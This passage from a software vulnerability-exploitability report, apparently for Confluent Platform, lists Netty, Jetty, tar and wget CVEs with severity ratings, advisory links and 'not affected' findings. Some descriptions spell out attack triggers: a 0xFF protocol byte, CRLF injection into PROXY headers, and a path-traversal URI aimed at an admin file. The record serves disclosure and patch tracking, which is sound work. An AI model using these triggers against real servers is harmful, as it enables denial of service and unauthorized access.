          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#a923fa68-2e3a-4f83-8dd4-2073f04d5906"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#bb54d734-af62-4d8c-90d2-0cff3bf33137"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#cb07c722-7be9-41fd-af9b-c1d5848d257d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-73508",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        772
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.dns.AbstractDnsRecord, io.netty.handler.codec.dns.DefaultDnsRecordDecoder.decodeRecord(), and io.netty.handler.codec.dns.DnsCodecUtil.decompressDomainName() failed to release retained or newly allocated ByteBuf objects when IDN.toASCII() or encodeDomainName() rejected a malformed domain name, allowing unauthenticated remote DNS packets to leak direct memory incrementally until denial of service. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-dns to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-73508"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-73508"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mfg7-5gfp-c4w3"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-73508"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-73508"
        }
      ],
      "published": "2026-08-13T15:20:17+00:00",
      "updated": "2026-08-13T18:18:17+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ef62eb8e-02b2-4be6-b1ed-8550d350e8e1"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#57dc4055-01df-4d40-acb1-cfe9cd41d3f5"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#94beca63-b79e-4ef1-8ce7-8a4d7a4ce33f"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#8097eea7-149f-4c9f-bf7c-cc542202e52d"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#828aebf1-086a-4364-82a5-041f1c8a9a32"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#bd1244d8-7e76-47fd-946a-1ad4f2d3a31d"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#eed89013-a2f1-4e12-be87-33856032257a"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f79a156c-1b70-4bfc-8c44-e6f4c31f0305"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#6de2186f-0d40-4c3b-b035-b3e1a87dd3cf"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#7df0760a-5ceb-434f-9333-91b6f01d8a7a"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#bd278cc4-c269-428b-8ebd-c88a442e49bb"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ef5dada8-a42c-4531-992f-b4ec63970860"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#48aab3ab-8eda-4d17-b7ab-d0ea45edfbde"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-dns@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-55851",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final up to (but not including) 4.2.16.Final, and 4.1.0.Final up to (but not including) 4.1.135, the `HAProxyMessageDecoder` in Netty's `codec-haproxy` module performs protocol version detection by reading the 13th byte as a signed Java `byte` and widening it to `int` without masking; a PROXY protocol v2 binary prefix followed by version byte `0xFF` sign-extends to `-1`, collides with the decoder's need-more-data sentinel, and causes `ByteToMessageDecoder` to accumulate inbound bytes in an unbounded `cumulation` buffer until direct memory is exhausted. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55851"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55851"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q6cq-mhr2-jmr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55851"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55851"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:48:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only genuine wiring of the HAProxy decoder anywhere in the CP repo set is exclusively Confluent Cloud infrastructure that is not shipped with Confluent Platform."
      }
    },
    {
      "id": "CVE-2026-59919",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy encoder (\u00a0HAProxyMessageEncoder\u00a0) writes AF_UNIX source and destination socket addresses into the HAProxy V1 text protocol without validating them for CRLF characters, so an attacker who controls an AF_UNIX address can inject \u00a0\\r\\n\u00a0 sequences and split the single PROXY header into multiple lines. This is possible because the V1 protocol uses CRLF as its line terminator and, unlike IPv4/IPv6 addresses whose format checks implicitly reject CRLF, AF_UNIX addresses are only validated for length (up to 108 bytes), allowing a forged second PROXY header line that spoofs the client source/destination IP to a downstream server or load balancer. The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59919"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59919"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-wh89-7897-x99h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59919"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59919"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:33:28+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6790",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        20
      ],
      "description": "In Eclipse Jetty, for HTTP/1, HTTP/2 and HTTP/3 requests, there is no strict check that the request authority (host and port) matches what provided in the Host header (if present).\n\n\n\n\nThis was not enforced in earlier HTTP RFC (for example, in RFC 2616), but it is in the latest RFC (9110 and 9112).\n\n\n\n\nThis mismatch can cause a number of problems that may be classified as vulnerabilities such as:\n\n\n\n  *  \n        \n      URI constructions (for example, for redirects -- this is typical for login pages)\n\n  *  \n        \n      Virtual host selection\n\n  *  \n        \n      Reverse proxying\n\n  *  \n        \n      Misleading logs\n\n  *  \n        \n      Etc.\n\n\n\n\n\n\nGiven that the latest RFCs require that request authority and Host header must match, Jetty should enforce this invariant.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-server to version 12.0.35, 12.1.9",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6790"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6790"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/3e5a4daec196859b8886b6f67b1157dab47cdb6f"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/67ba9e6b39661810123680d9c894e99a7940c73d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/cbca3076f7c914a232e7a8b22fa95fbf7e67a6cc"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/14870"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14871"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14897"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14970"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.35"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.9"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-7p3p-8qv8-m2vh"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/99"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6790"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6790"
        }
      ],
      "published": "2026-07-14T09:16:41+00:00",
      "updated": "2026-07-14T18:35:54+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-8384",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        647
      ],
      "description": "In Eclipse Jetty, an HTTP URI of this form:\n\n\n\n\n\n/public;/../admin/secret.txt\n\n\n\n\n\n\n\n\nresults in an unresolved path of:\n\n\n\n\n\n/public/../admin/secret.txt\n\n\n\n\n\n\n\n\ninstead of the expected:\n\n\n\n\n\n/admin/secret.txt\n\n\n\n\n\n\n\n\nJetty itself is not affected, as it will not serve the secret.txt file because it will not pass the alias checker (only resolved resources are served).\n\n\n\n\nHowever, web applications that rely on resolved paths being provided by Jetty may be confused when receiving an unresolved path.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-util to version 12.0.35, 12.1.9",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8384"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8384"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/82969c77f6da46e27008b10b3c14840cd31db084"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/ade27ce93a37c33278720250d85c48601230ae3f"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14969"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14973"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.35"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.9"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-w7x5-g22v-xqhr"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/108"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8384"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8384"
        }
      ],
      "published": "2026-07-14T09:16:42+00:00",
      "updated": "2026-07-14T18:39:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-util@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2005-2541",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2005-2541"
        },
        {
          "url": "http://marc.info/?l=bugtraq&m=112327628230258&w=2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2005-2541"
        },
        {
          "url": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2005-2541"
        }
      ],
      "published": "2005-08-10T04:00:00+00:00",
      "updated": "2026-04-16T00:27:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-31879",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-31879"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-31879"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31879"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?56909"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20210618-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
        }
      ],
      "published": "2021-04-29T05:15:08+00:00",
      "updated": "2026-06-17T03:52:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
